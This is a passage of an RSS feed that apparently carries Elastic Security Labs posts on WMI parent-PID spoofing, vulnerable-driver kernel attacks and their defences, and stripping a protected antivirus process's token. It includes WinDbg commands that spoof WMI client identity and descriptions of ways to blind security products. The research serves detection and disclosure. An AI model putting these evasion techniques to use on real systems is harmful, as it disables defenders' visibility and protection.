<p>In this case, the event was actually being written by <code>ntdll!EtwEventWrite</code> in the WMI Core Service (svchost.exe -k netsvcs -p -s Winmgmt) – not in the WMI Provider Host (WmiPrvSE.exe).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image9.jpg" alt="" /></p>
<p>Putting a breakpoint on <code>PublishWin32ProcessCreation</code>, we see via parameter value inspection that the <code>ClientProcessId</code> is passed (on the stack) as the 10th parameter. We can then look at <code>InspectWin32ProcessCreateExecution</code> to determine how that value is derived.</p>
<p>A roughly tidied Ghidra decompilation of <code>InspectWin32ProcessCreateExecution</code> might resemble this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image1.jpg" alt="" /></p>
<p>We can see that the client process id comes from the <code>CWbemNamespace</code> object. Searching for reference to this structure field, we find that it is only set in <code>CWbemNamespace::Initialize</code>. Our earlier stack trace started in <code>wbemcore!CCoreQueue</code> and this initialization appears to have occurred prior to queuing. So we could statically search for all locations where the initialization occurs or dynamically observe the actual code paths taken.</p>
<p>We know that this activity is being initiated over RPC, so one approach would be to place breakpoints on RPC send/receive functions in the client and server. An alternative might be to fire up Wireshark and examine the packet capture of the entire interaction when it occurs in cleartext over the network. We learned somewhat late in our research that Microsoft had excellent documentation for the <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-wmi/1106e73c-9a7c-4e25-9216-0a5d8e581d62">WMI Protocol Initialization</a> that explained much of this and might have saved a little time.</p>
<p>We took the first approach. The second parameter to <code>InspectWin32ProcessCreateExecution</code> is an <a href="https://docs.microsoft.com/en-us/windows/win32/api/wbemcli/nn-wbemcli-iwbemcontext"><code>IWbemContext</code></a> – which allows the caller to provide additional information to providers. This is how the parameters to <code>Win32_Process::Create</code> are being passed. What if the first parameter was related to the WMI Client passing additional context to the WMI Core?</p>
<p><code>IWbemLevel1Login::NTLMLogin</code> stood out in the call traces as a good place to start looking.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image24.jpg" alt="" /></p>
<p>And right next to its COM interface UUID was <code>IWbemLoginClientID[Ex]</code>, which had a very interesting <code>SetClientInfo</code> call documented on MSDN:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image2.jpg" alt="" /></p>
<p>The WMI client calls <code>wbemprox!SetClientIdentity</code> which looks roughly like this:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image18.jpg" alt="" /></p>
<p><code>IWbemLoginClientIDEx</code> is currently undocumented, but we can infer the parameters from the values passed.</p>
<p>At this point, it looks like the client process is passing <code>ClientMachineName</code>, <code>ClientMachineFQDN</code>, <code>ClientProcessId</code>, and <code>ClientProcessCreationTime</code> to the WMI Core. We can confirm this by changing the values and seeing if the ETW event logged by the WMI Core changes.</p>
<p>Using WinDbg, we set up a couple of quick patches in the WMI client process and then spawned a process via WMI:</p>
<pre><code>windbg&gt; bp wbemprox!SetClientIdentity+0xff &quot;eu @rdx \&quot;SPOOFED....\&quot;; gc&quot;
windbg&gt; bp wbemprox!SetClientIdentity+0x1c4 &quot;r r9=0n1337; eu @r8 \&quot;SPOOFED.COM\&quot;; gc&quot;
PS&gt; ([wmiclass]&quot;ROOT\CIMv2:Win32_Process&quot;).Create(&quot;calc.exe&quot;)
</code></pre>
<p>Using SilkETW (or another ETW capture mechanism), we see the following event from the server process:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/image12.jpg" alt="" /></p>
<p>The server is blindly reporting the values provided by the client. This means that this event cannot be relied upon for un-breaking WMI process provenance trees as the adversary can control the client process id. Falsely reporting this information would be an interesting defense evasion, and a tough one to identify reliably.</p>
<p>Further, a remote adversary can actually pass a <code>ClientMachine</code> name equal to the local hostname, and this WMI event will mistakenly log IsLocal as true (see the earlier decompilation of <code>InspectWin32ProcessCreateExecution</code>). This will make the event look like a suspicious local execution rather than lateral movement, and represents another defense evasion opportunity.</p>
<p>So, this isn’t an approach that other RPC servers should follow after all.</p>
<h2>Conclusion</h2>
<p>In trying to generically solve LRPC provenance, we unfortunately demonstrate that the one existing LRPC provenance data point is unreliable. This has been reported to Microsoft where it was assessed as a next-version candidate bug that will be evaluated for future releases.</p>
<p>Our fervent hope is that the ultimate solution involves the creation of a documented API that allows a server LRPC thread to determine the client thread of a connection. This would provide endpoint security products with a reliable mechanism to identify operations being proxied through LRPC calls in an attempt to hide their origin.</p>
<p>More generally though, this research highlights the need for defenders to have a detailed understanding of data provenance. It is necessary but not sufficient to know that the data was logged by a trustworthy source such as the kernel or a server process. You must also understand whether the data was intrinsic to the event or provided by a potentially untrustworthy client. Otherwise, adversaries will exploit the gaps.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/effective-parenting-detecting-lrpc-based-parent-pid-spoofing/blog-thumb-sorting-colors.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Stopping Vulnerable Driver Attacks]]></title>
            <link>https://www.elastic.co/kr/security-labs/stopping-vulnerable-driver-attacks</link>
            <guid>stopping-vulnerable-driver-attacks</guid>
            <pubDate>Wed, 01 Mar 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.]]></description>
            <content:encoded><![CDATA[<h2>Key takeaways</h2>
<ul>
<li>Ransomware actors are leveraging vulnerable drivers to tamper with endpoint security products.</li>
<li>Elastic Security <a href="https://github.com/elastic/protections-artifacts/search?q=VulnDriver">released</a> 65 YARA rules to detect vulnerable driver abuse.</li>
<li>Elastic Endpoint (8.3+) protects users from this threat.</li>
</ul>
<h2>Background</h2>
<p>In 2018, <a href="https://twitter.com/GabrielLandau">Gabriel Landau</a> and <a href="https://twitter.com/dez_">Joe Desimone</a> presented a <a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Desimone-Kernel-Mode-Threats-and-Practical-Defenses.pdf">talk</a> at Black Hat covering the evolution of kernel mode threats on Windows. The most concerning trend was towards leveraging known good but vulnerable drivers to gain kernel mode execution. We showed this was practical, even with hypervisor mode integrity protection (<a href="https://docs.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-hvci-enablement">HVCI</a>) and Windows Hardware Quality Labs (<a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-release-signature">WHQL</a>) signing requirement enabled. At the time, the risk to everyday users was relatively low, as these techniques were mostly leveraged by advanced state actors and top red teams.</p>
<p>Fast forward to 2022, and attacks leveraging vulnerable drivers are a growing concern due to a <a href="https://github.com/hfiref0x/KDU">proliferation</a> of open source <a href="https://github.com/br-sn/CheekyBlinder">tools</a> to perform these <a href="https://github.com/Cr4sh/KernelForge">attacks</a>. Vulnerable drivers have now been <a href="https://news.sophos.com/en-us/2020/02/06/living-off-another-land-ransomware-borrows-vulnerable-driver-to-remove-security-software/">used by ransomware</a> to terminate security software before encrypting the system. Organizations can reduce their risk by limiting administrative user permissions. However, it is also imperative for security vendors to protect the user-to-kernel boundary because once an attacker can execute code in the kernel, security tools can no longer effectively protect the host. Kernel access gives attackers free rein to tamper or terminate endpoint security products or inject code into protected processes.</p>
<p>This post includes a primer on kernel mode attacks, along with Elastic’s recommendations for securing users from kernel attacks leveraging vulnerable drivers.</p>
<h2>Attack flow</h2>
<p>There are a number of flaws in drivers that can allow attackers to gain kernel mode access to fully compromise the system and remain undetected. Some of the <a href="https://www.welivesecurity.com/2022/01/11/signed-kernel-drivers-unguarded-gateway-windows-core/">most common</a> flaws include granting user mode processes write access to virtual memory, physical memory, or <a href="https://en.wikipedia.org/wiki/Model-specific_register">model-specific registers</a> (MSR). Classic buffer overflows and missing bounds checks are also common.</p>
<p>A less common driver flaw is unrestricted <a href="https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458">handle duplication</a>. While this may seem like innocuous functionality at first glance, handle duplication can be leveraged to gain full kernel code execution by user mode processes. For example, the latest <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer">Process Explorer</a> driver by Microsoft exposes <a href="https://github.com/Yaxser/Backstab">such a function</a>.</p>
<p>An attacker can leverage this vulnerability to duplicate a <a href="https://www.unknowncheats.me/forum/anti-cheat-bypass/312732-physmeme-handle-device-physicalmemory-door-kernel-land-bypasses.html#post2315458">sensitive handle</a> to raw physical memory present in the System (PID 4) process.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image1.jpg" alt="Handle to Physical Memory in the System process" /></p>
<p>After obtaining <a href="http://publications.alex-ionescu.com/Recon/ReconBru%202017%20-%20Getting%20Physical%20with%20USB%20Type-C,%20Windows%2010%20RAM%20Forensics%20and%20UEFI%20Attacks.pdf">the cr3 value</a>, the attacker can walk the page tables to convert virtual kernel addresses to their associated physical addresses. This grants an arbitrary virtual read/write primitive, which attackers can leverage to easily tamper with kernel data structures or execute arbitrary kernel code. On HVCI-enabled systems, thread control flow can be hijacked to execute arbitrary kernel functions as shown below.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image3.jpg" alt="Hijacking Threat Flow Control" /></p>
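<p>To make the page-table walk above concrete, the following is a minimal illustrative sketch (not Elastic&#8217;s or any attacker&#8217;s actual tooling) of the index arithmetic involved: with standard x86-64 4&#160;KiB paging, a virtual address decomposes into four 9-bit table indices plus a 12-bit page offset, and an attacker holding cr3 walks those four levels to find the physical page.</p>

```python
# Illustrative only: decompose an x86-64 virtual address into the 4-level
# page-table indices used when walking page tables from a known cr3 value.
# Standard 4 KiB paging: 9 bits per level, 12-bit page offset.

def page_table_indices(vaddr: int) -> dict:
    return {
        "pml4": (vaddr >> 39) & 0x1FF,  # Page Map Level 4 index
        "pdpt": (vaddr >> 30) & 0x1FF,  # Page Directory Pointer Table index
        "pd":   (vaddr >> 21) & 0x1FF,  # Page Directory index
        "pt":   (vaddr >> 12) & 0x1FF,  # Page Table index
        "offset": vaddr & 0xFFF,        # offset within the 4 KiB page
    }

# Example: a typical Windows kernel-space address
print(page_table_indices(0xFFFFF80312345678))
```

<p>A real walk would read the physical memory handle at each level to fetch the next table&#8217;s base address; the sketch shows only the index extraction.</p>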
<p>We reported this issue to Microsoft in the vulnerable driver <a href="https://www.microsoft.com/en-us/wdsi/driversubmission">submission portal</a> on July 26, but as of this writing have not received a response. We hope Microsoft will consider this a serious security issue worth addressing. Ideally, they will release a fixed version without the vulnerable <a href="https://docs.microsoft.com/en-us/windows/win32/devio/device-input-and-output-control-ioctl-">IOCTLs</a> and include it in the default HVCI blocklist. This would be consistent with the <a href="https://github.com/MicrosoftDocs/windows-itpro-docs/blob/ce56a2f15015e07bf35cd05ce3299340d16e759a/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md?plain=1#L391">blocking</a> of the ProcessHacker (now known as <a href="https://github.com/winsiderss/systeminformer">System Informer</a>) driver for the <a href="https://www.unknowncheats.me/forum/downloads.php?do=file&amp;id=25441">same flaw.</a></p>
<h2>Blocklisting</h2>
<p>Blocklisting prevents known vulnerable drivers from loading on a system, and is a great first step toward addressing the vulnerable driver problem. Blocklisting can raise the cost of kernel attacks to levels out of reach for some criminal groups, while maintaining low false positive rates. The downside is that it does not stop more <a href="https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/">advanced groups</a>, which can identify new, previously unknown vulnerable drivers.</p>
<p>Microsoft maintains a <a href="https://github.com/MicrosoftDocs/windows-itpro-docs/blob/public/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules.md">catalog</a> of known exploited or malicious drivers, which should be a minimum baseline. This catalog consists of rules using various combinations of <a href="https://reversea.me/index.php/authenticode-i-understanding-windows-authenticode/">Authenticode</a> hash, certificate hash (also known as <a href="https://www.rfc-editor.org/rfc/rfc5280#section-4.1">TBS</a>), internal file name, and version. The catalog is intended to be used by Windows Defender Application Control (<a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview">WDAC</a>). We used this catalog as a starting point for a more comprehensive list using the <a href="https://virustotal.github.io/yara/">YARA</a> community standard.</p>
<p>To expand on the existing list of known vulnerable drivers, we pivoted through VirusTotal data with known vulnerable import hashes and other metadata. We also combed through public attack tooling to identify additional vulnerable drivers. As common practice for Elastic Security, we made our <a href="https://github.com/elastic/protections-artifacts/search?q=VulnDriver">blocklist</a> available to the community. In Elastic <a href="https://www.elastic.co/kr/security/endpoint-security">Endpoint Security</a> version 8.3 and newer, all drivers are validated against the blocklist in-line before they are allowed to load onto the system (shown below).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image6.jpg" alt="enter image description here" /></p>
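<p>The core of hash-based blocklisting can be sketched in a few lines (this is an illustration only, not Elastic Endpoint&#8217;s implementation; real blocklists such as Microsoft&#8217;s catalog and our YARA rules also match Authenticode hashes, certificate TBS hashes, internal file names, and version ranges, not just flat file hashes):</p>

```python
# Illustrative sketch: deny a driver load if its SHA-256 is blocklisted.
import hashlib

def sha256_file(path: str) -> str:
    """Compute the SHA-256 of a file, streaming to handle large drivers."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def allow_driver_load(path: str, blocklist: set[str]) -> bool:
    """Return False (deny the load) if the driver's hash is blocklisted."""
    return sha256_file(path) not in blocklist
```

<p>In-line enforcement means this check happens before the driver is mapped, rather than scanning after the fact.</p>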
<h2>Allowlisting</h2>
<p>One of the most robust defenses against this driver threat is to allow only combinations of driver signer, internal file name, version, and hashes that are known to be in use. We recommend organizations be as strict as feasible. For example, do not blanket-trust all <a href="https://docs.microsoft.com/en-us/windows-hardware/drivers/install/whql-test-signature-program">WHQL</a>-signed drivers. This is the classic application control method, albeit focused on drivers. An organization&#8217;s diversity of drivers should be more manageable than the entirety of its user mode applications. Windows Defender Application Control (<a href="https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview">WDAC</a>) is a powerful built-in feature that can be configured this way. However, the learning curve and maintenance costs may still be too high for organizations without well-staffed security teams. To reap most of the benefits of the allowlisting approach while reducing the cost of implementation (ideally to blocklisting levels), we recommend two approaches in tandem: behavior control and alert on first seen.</p>
<h2>Behavior control</h2>
<p>The concept behind behavior control is to produce a more manageable set of allowlistable behavior choke points that can be tuned for high confidence. For example, we can create a behavior control around which applications are allowed to write drivers to disk. This may start with a relatively loose and simple rule:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image2.jpg" alt="Example EQL Query" /></p>
<p>From there, we can allowlist the benign applications that are known to exhibit this behavior. Then we receive and triage hits, tune the rule until it becomes high confidence, and then ship as part of our <a href="https://www.elastic.co/kr/blog/whats-new-elastic-security-7-15-0">malicious behavior protection</a>. Elastic SIEM users can use the same technique to <a href="https://www.elastic.co/kr/guide/en/security/current/rules-ui-create.html">create custom</a> Detection Engine <a href="https://github.com/elastic/detection-rules">rules</a> tuned specifically for their environment.</p>
<h2>First seen</h2>
<p>Elastic Security in 8.4 adds another powerful tool that can be used to identify suspicious drivers. This is the <a href="https://www.elastic.co/kr/guide/en/security/8.4/rules-ui-create.html#create-new-terms-rule">“New Terms” rule type</a>, which can be used to create an alert when a term (driver hash, signer, version, internal file name, etc) is observed for the first time.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image5.jpg" alt="First Seen" /></p>
<p>This empowers security teams to quickly surface unusual drivers the first time they&#8217;re seen in their environment, creating a detection opportunity even for previously unknown vulnerable drivers and other driver-based adversary tradecraft.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/image4.jpg" alt="Visualizing It" /></p>
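<p>The idea behind first-seen detection can be sketched as follows (a hypothetical illustration of the concept, not the Elastic &#8220;New Terms&#8221; rule implementation, which tracks terms over a configurable history window in Elasticsearch):</p>

```python
# Illustrative sketch: alert the first time a term -- here, a driver's
# (signer, internal file name, hash) tuple -- is observed in the environment.

def first_seen_alerts(events, key_fields=("signer", "name", "sha256")):
    seen = set()
    alerts = []
    for event in events:
        key = tuple(event.get(f) for f in key_fields)
        if key not in seen:
            seen.add(key)          # remember the term...
            alerts.append(event)   # ...and surface its first occurrence
    return alerts

events = [
    {"signer": "Contoso", "name": "gdrv.sys", "sha256": "aa"},
    {"signer": "Contoso", "name": "gdrv.sys", "sha256": "aa"},  # repeat: no alert
    {"signer": "Unknown", "name": "evil.sys", "sha256": "bb"},
]
print(len(first_seen_alerts(events)))  # 2 distinct terms
```

<p>Choosing coarser key fields (signer only) trades noise for coverage; finer keys (full hash) alert on every new build.</p>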
<h2>Conclusion</h2>
<p>Vulnerable driver exploitation, once relegated to advanced adversaries, has now proliferated to the point of being used in ransomware attacks. The time for the security community to come together and act on this problem is now. We can start raising the cost by collaborating on blocklists as a community. We should also investigate additional detection strategies, such as behavior control and anomaly detection, to raise the cost further without requiring significant security expertise or resources.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/stopping-vulnerable-driver-attacks/blog-thumb-clock-gears.jpg" length="0" type="image/jpg"/>
        </item>
        <item>
            <title><![CDATA[Sandboxing Antimalware Products for Fun and Profit]]></title>
            <link>https://www.elastic.co/kr/security-labs/sandboxing-antimalware-products</link>
            <guid>sandboxing-antimalware-products</guid>
            <pubDate>Tue, 21 Feb 2023 00:00:00 GMT</pubDate>
            <description><![CDATA[This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack.]]></description>
            <content:encoded><![CDATA[<p>This article demonstrates a flaw that allows attackers to bypass a Windows security mechanism which protects anti-malware products from various forms of attack. This is of particular interest because we build and maintain two anti-malware products that benefit from this protection.</p>
<h2>Protected Anti-Malware Services</h2>
<p>Windows 8.1 <a href="https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">introduced</a> a concept of Protected Antimalware Services. This enables specially-signed programs to run such that they are immune from tampering and termination, even by administrative users. Microsoft’s documentation (<a href="https://web.archive.org/web/20211019010629/https://docs.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-">archived</a>) describes this as:</p>
<blockquote>
<p>In Windows 8.1, a new concept of protected service has been introduced to allow anti-malware user-mode services to be launched as a protected service. After the service is launched as protected, Windows uses code integrity to only allow trusted code to load into the protected service. Windows also protects these processes from code injection and other attacks from admin processes.</p>
</blockquote>
<p>The goal is to prevent malware from instantly disabling your antivirus and then running amok. For the rest of this article, we refer to these protected services as Protected Process Light (PPL) processes. For more depth, <a href="https://twitter.com/aionescu">Alex Ionescu</a> goes into great detail on protected processes in his <a href="https://www.youtube.com/watch?v=35L_qJNMu1A">talk at NoSuchCon 2014</a>.</p>
<p>To be able to run as a PPL, an anti-malware vendor must apply to Microsoft, prove their identity, sign binding legal documents, implement an <a href="https://docs.microsoft.com/en-us/windows/win32/w8cookbook/secured-boot">Early Launch Anti-Malware</a> (ELAM) driver, run it through a test suite, and submit it to Microsoft for a special Authenticode signature. It is not a trivial process. Once this process is complete, the vendor can <a href="https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-installelamcertificateinfo">use this ELAM driver</a> to have Windows protect their anti-malware service by running it as a PPL.</p>
<p>You can see PPL in action yourself by running the following from an elevated administrative command prompt on a default Windows 10 install:</p>
<p><strong>Protected Process Light in Action</strong></p>
<pre><code>C:\WINDOWS\system32&gt;whoami
nt authority\system

C:\WINDOWS\system32&gt;whoami /priv | findstr &quot;Debug&quot;
SeDebugPrivilege                Debug programs                    Enabled

C:\WINDOWS\system32&gt;taskkill /f /im MsMpEng.exe
ERROR: The process &quot;MsMpEng.exe&quot; with PID 2236 could not be terminated.
Reason: Access is denied.

</code></pre>
<p>As you can see here, even a user running as SYSTEM (or an elevated administrator) with <a href="https://devblogs.microsoft.com/oldnewthing/20080314-00/?p=23113">SeDebugPrivilege</a> cannot terminate the PPL Windows Defender anti-malware Service (MsMpEng.exe). This is because non-PPL processes like taskkill.exe cannot obtain handles with the PROCESS_TERMINATE access right to PPL processes using APIs such as <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocess">OpenProcess</a>.</p>
<p>In summary, Windows attempts to protect PPL processes from non-PPL processes, even those with administrative rights. This is both documented and implemented. That being said, with PROCESS_TERMINATE blocked, let’s see if there are other ways we can interfere with it instead.</p>
<h2>Windows Tokens</h2>
<p>A Windows token can be thought of as a security credential. It says who you are and what you’re allowed to do. Typically when a user runs a process, that process runs with their token and can do anything the user can do. Some of the most important data within a token include:</p>
<ul>
<li>User identity</li>
<li>Group membership (e.g. Administrators)</li>
<li>Privileges (e.g. SeDebugPrivilege)</li>
<li>Integrity level</li>
</ul>
<p>Tokens are a critical part of Windows authorization. Any time a Windows thread accesses a <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/securable-objects">securable object</a>, the OS performs a security check. It compares the thread’s effective token against the <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/security-descriptors">security descriptor</a> of the object being accessed. You can read more about tokens in the Microsoft <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/access-tokens">access token documentation</a> and the Elastic blog post that <a href="https://www.elastic.co/kr/blog/introduction-to-windows-tokens-for-security-practitioners">introduces Windows tokens</a>.</p>
<h3>Sandboxing Tokens</h3>
<p>Some applications, such as web browsers, have been repeated targets of exploitation. Once an attacker successfully exploits a browser process, the exploit payload can perform any action that the browser process can perform. This is because it shares the browser’s token.</p>
<p>To mitigate the damage from such attacks, web browsers have moved much of their code into lower-privilege worker processes. This is typically done by creating a restricted security context called a sandbox. When a sandboxed worker needs to perform a privileged action on the system, such as saving a downloaded file, it can ask a non-sandboxed “broker” process to perform the action on its behalf. If the sandboxed process is exploited, the goal is to limit the payload’s ability to cause harm to only resources accessible by the sandbox.</p>
<p>While modern sandboxing involves several components of OS security, one of the most important is a low-privilege, or restricted, token. New sandbox tokens can be created with APIs such as <a href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-createrestrictedtoken">CreateRestrictedToken</a>. Sometimes a sandboxed process needs to lock itself down after performing some initialization. The <a href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokenprivileges">AdjustTokenPrivileges</a> and <a href="https://docs.microsoft.com/en-us/windows/win32/api/securitybaseapi/nf-securitybaseapi-adjusttokengroups">AdjustTokenGroups</a> APIs allow this adjustment. These APIs enable privileges and groups to be &#8220;forfeit&#8221; from an existing process&#8217;s token in such a way that they cannot be restored without creating a new token outside the sandbox.</p>
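<p>The one-way nature of this forfeiture can be modeled with a toy sketch (this is an illustration of the semantics, not the Windows implementation): AdjustTokenPrivileges with the SE_PRIVILEGE_REMOVED attribute deletes a privilege from the token for good, whereas a merely disabled privilege can be re-enabled later.</p>

```python
# Toy model of token privilege semantics: disabled privileges can be
# re-enabled, but a removed privilege is gone for the token's lifetime.

class Token:
    def __init__(self, privileges):
        self.privs = {p: True for p in privileges}  # name -> enabled?

    def disable(self, name):
        if name in self.privs:
            self.privs[name] = False  # still present, just off

    def enable(self, name):
        if name not in self.privs:
            raise PermissionError(f"{name} was removed; cannot re-add")
        self.privs[name] = True

    def remove(self, name):
        self.privs.pop(name, None)  # models SE_PRIVILEGE_REMOVED

t = Token(["SeDebugPrivilege", "SeImpersonatePrivilege"])
t.disable("SeDebugPrivilege")
t.enable("SeDebugPrivilege")          # disabled privileges can come back
t.remove("SeImpersonatePrivilege")
# t.enable("SeImpersonatePrivilege") would now raise PermissionError
```
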
<p>One <a href="https://chromium.googlesource.com/chromium/src/+/master/docs/design/sandbox.md">commonly used sandbox</a> today is part of Google Chrome. Even some <a href="https://www.microsoft.com/security/blog/2018/10/26/windows-defender-antivirus-can-now-run-in-a-sandbox/">security products</a> are getting into sandboxing these days.</p>
<h3>Accessing Tokens</h3>
<p>Windows provides the <a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-openprocesstoken">OpenProcessToken</a> API to enable interaction with process tokens. MSDN states that one must have the PROCESS_QUERY_INFORMATION right to use OpenProcessToken. Since a non-protected process can only get PROCESS_QUERY_LIMITED_INFORMATION access to a PPL process (note the LIMITED), it is seemingly impossible to get a handle to a PPL process&#8217;s token. However, MSDN is incorrect in this case. With only PROCESS_QUERY_LIMITED_INFORMATION, we can successfully open the token of a protected process. <a href="https://twitter.com/tiraniddo">James Forshaw</a> explains this documentation discrepancy in more depth, showing the underlying <a href="https://www.tiraniddo.dev/2017/05/reading-your-way-around-uac-part-2.html">de-compiled kernel code</a>.</p>
<p>Tokens are themselves securable objects. As such, regular access checks still apply. The effective token of the thread attempting to access the token is checked against the security descriptor of the token being accessed for the requested access rights (TOKEN_QUERY, TOKEN_WRITE, TOKEN_IMPERSONATE, etc). For more detail about access checks, see the Microsoft article, “<a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/how-dacls-control-access-to-an-object">How Access Checks Work</a>.”</p>
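<p>The DACL portion of that access check can be sketched as a simplified model (this omits ownership, privilege overrides, and integrity/trust-label checks that the real kernel SeAccessCheck also performs; the SIDs and mask values below follow the Windows SDK):</p>

```python
# Simplified DACL evaluation: walk ACEs in order; a matching deny ACE
# rejects immediately, allow ACEs accumulate granted rights until the
# requested access mask is fully satisfied.

TOKEN_QUERY = 0x0008
TOKEN_WRITE = 0x000200E0  # STANDARD_RIGHTS_WRITE | ADJUST_{PRIVILEGES,GROUPS,DEFAULT}

def access_check(token_sids, dacl, desired):
    granted = 0
    for ace in dacl:                      # each ace: {"type", "sid", "mask"}
        if ace["sid"] not in token_sids:
            continue                      # ACE doesn't apply to this token
        if ace["type"] == "deny" and ace["mask"] & desired:
            return False                  # deny ACEs win immediately
        if ace["type"] == "allow":
            granted |= ace["mask"] & desired
            if granted == desired:
                return True
    return granted == desired

# The MsMpEng.exe token DACL grants SYSTEM (S-1-5-18) full control:
dacl = [{"type": "allow", "sid": "S-1-5-18", "mask": TOKEN_QUERY | TOKEN_WRITE}]
print(access_check({"S-1-5-18"}, dacl, TOKEN_WRITE))       # True
print(access_check({"S-1-5-32-545"}, dacl, TOKEN_QUERY))   # False: Users get nothing
```

<p>This ordering rule is why placing deny ACEs first matters in real DACLs.</p>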
<h2>The Attack</h2>
<p><a href="https://github.com/processhacker/processhacker/releases/tag/v2.39">Process Hacker</a> provides a nice visualization of token security descriptors. Taking a look at Windows Defender’s (MsMpEng.exe) token, we see the following Discretionary Access Control List (DACL):</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/sandboxing-antimalware-products/advanced-security-settings.jpg" alt="" /></p>
<p>Note that the SYSTEM user has full control over the token. This means, unless some other mechanism is protecting the token, a thread <a href="https://powersploit.readthedocs.io/en/latest/Privesc/Get-System/">running as SYSTEM</a> can modify the token. When such modification is possible, it violates the desired “PPL is protected from administrators” design goal.</p>
<h3>Demo</h3>
<p>Alas, there is no other mechanism protecting the token. Using this technique, an attacker can forcefully remove all privileges from the MsMpEng.exe token and reduce it from <a href="https://docs.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control">system to untrusted integrity</a>. Being nerfed to untrusted integrity prevents the victim process from accessing most securable resources on the system, quietly incapacitating the process without terminating it.</p>
&lt;Video vidyard_uuid=&quot;wSgaLpcXyZLupdiwg6BNyj&quot; /&gt;
<p>In this video, the attacker could have further restricted the token, but the privilege and integrity changes were sufficient to prevent MsMpEng.exe from detecting and blocking a Mimikatz execution. We felt this illustrated a valid proof of concept.</p>
<h2>Defense</h2>
<p>Newer versions of Windows include an undocumented feature called “trust labels.” Trust labels are part of the <a href="https://docs.microsoft.com/en-us/windows/win32/ad/retrieving-an-objectampaposs-sacl">System Access Control List</a> (SACL), an optional component of every security descriptor. Trust labels allow Windows to restrict specific access rights to certain types of protected processes. For example, Windows <a href="https://www.elastic.co/kr/blog/protecting-windows-protected-processes">protects</a> the \KnownDlls object directory from <a href="https://www.elastic.co/kr/blog/detect-block-unknown-knowndlls-windows-acl-hardening-attacks-cache-poisoning-escalation">modification by malicious administrators</a> using a trust label. We can see this with <a href="https://github.com/hfiref0x/WinObjEx64">WinObjEx64</a>:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/sandboxing-antimalware-products/KnownDlls-Trust-Label.jpg" alt="" /></p>
<p>Like \KnownDlls, tokens are securable objects, and thus it is possible to protect them against modification by malicious administrators. Elastic Security does this and is immune to this attack: it denies TOKEN_WRITE access to processes with a trust label below &#8220;Anti-Malware Light.&#8221; Because this protection is applied at runtime, however, there is still a brief window of vulnerability until it can apply the trust label.</p>
<p>Ideally, Windows would apply such a trust label to each PPL process’s token as it is created. This would eliminate the race condition and fix the vulnerability in the PPL mechanism. There is precedent. With a kernel debugger, we can see that Windows is already protecting the System process’ token on Windows (21H1 shown below) with a trust label:</p>
<pre><code>1: kd&gt; dx -r1 (((nt!_OBJECT_HEADER*)((@$cursession.Processes[0x4]-&gt;KernelObject-&gt;Token-&gt;Object - sizeof(nt!_OBJECT_HEADER))  &amp; ~0xf))-&gt;SecurityDescriptor &amp; ~0xf)
